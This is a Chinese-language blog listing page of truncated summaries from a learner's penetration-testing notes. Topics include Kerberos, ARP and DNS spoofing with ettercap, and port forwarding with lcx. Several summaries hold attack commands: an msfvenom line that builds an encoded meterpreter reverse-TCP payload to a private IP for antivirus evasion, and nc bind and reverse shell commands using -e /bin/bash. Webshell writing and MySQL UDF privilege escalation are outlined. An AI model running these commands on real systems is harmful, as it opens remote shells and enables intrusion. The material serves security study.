摘要:
学习了解kerberos协议,有助于我们后期理解黄金票据和白银票据的原理kerberos协议介绍kerberos 是一种由MIT(麻省理工大学)提出的一种网络身份验证协议,它旨在通过使用加密技术为客户端/服务端应用程序提供强大的认证服务。kerberos协议中主要由三个角色:(1)访问服务的client(一下表述为Client或者用户)(2)提供服务的server(一下表述为服务)(3)KDC(K... 阅读全文
摘要:
承接上一章,除了arp欺骗之外对的欺骗方法a)使用kali,对dns文件进行编辑使用的欺骗工具是ettercap。对dns文件编辑:添加一个A记录,解释到kali自身:b)进行欺骗通过命令行模式打开图形界面,选择Unified sniffing以中间人的方式进行嗅探选择网卡,开那个段上就选择那个段上的网卡选择dns_spoofc) 最后我们开始我们的dns欺骗,点击Start sniffing然后... 阅读全文
摘要:
这是我的学习总结,刚入坑网络安全,写的不好或者有什么错误的希望大佬们指正 首先了解ARP的作用以及原理: ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP栈中的网络层,负责将某个ip地址解析成对应的MAC地址,ARP协议的基本功能就是通过目标设备的 阅读全文
摘要:
免杀 msfvenom encoder编码器 -e 编码器 -i 编码次数 多次编码 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.5.172 lport=4444 -e x86/shikata_ga_nai -i 15 阅读全文
摘要:
反弹shell 1.nc 正向连接 攻击机 nc-vv 受害者ip 受害者port 受害者 nc-lvvp受害者port - e /bin/bash 反向连接 攻击机 nc -lvvp 攻击机... 阅读全文
摘要:
内网代理 http tunnel reDuh reGeorg 1.python2 安装 urllib3库 2.上传tunnel.nosocket.php代理脚本到web服务器 3.访问url,确认web服务器删tunnel。nosocket.php能够执行 4.... 阅读全文
摘要:
端口转发 lcx 流程 目标机 ./lcx -slave 跳板机ip 监听的端口 127.0.0.1 要转发的端口 跳板机(公网) ./lcx -listen 监听的端口 转发给攻击机访问的端口 攻击机 访问跳板机特定端口,即可访问到目标机特定端口 listen -listen <local por 阅读全文
摘要:
3.权限维持 windows cmd命令 写webshell 1.使用cmd命令写webshell,带有以及“空格”的时候,需要使用^进行转义: 例如:echo ^ > shell.php linux cobaltstrike 生成后门 ... 阅读全文
摘要:
服务提权 UDF提权 windows UDF mysql版本 < 5.1 , UDF导出到系统目录c:/windows/system32/ mysql版本>5.1 ,UDF导出到安静路径MYSQL/Lib/Plugin/ linux /usr/lib/mysql/plugin/ 要求有些权限,单引号 阅读全文
摘要:
windows 系统漏洞、ms系列 ms08-067 rpc ms09-012 pr.exe/巴西烤肉提权 ms09-020 iis5/6 ms12-202 rdp蓝屏 ms17-010 永恒... 阅读全文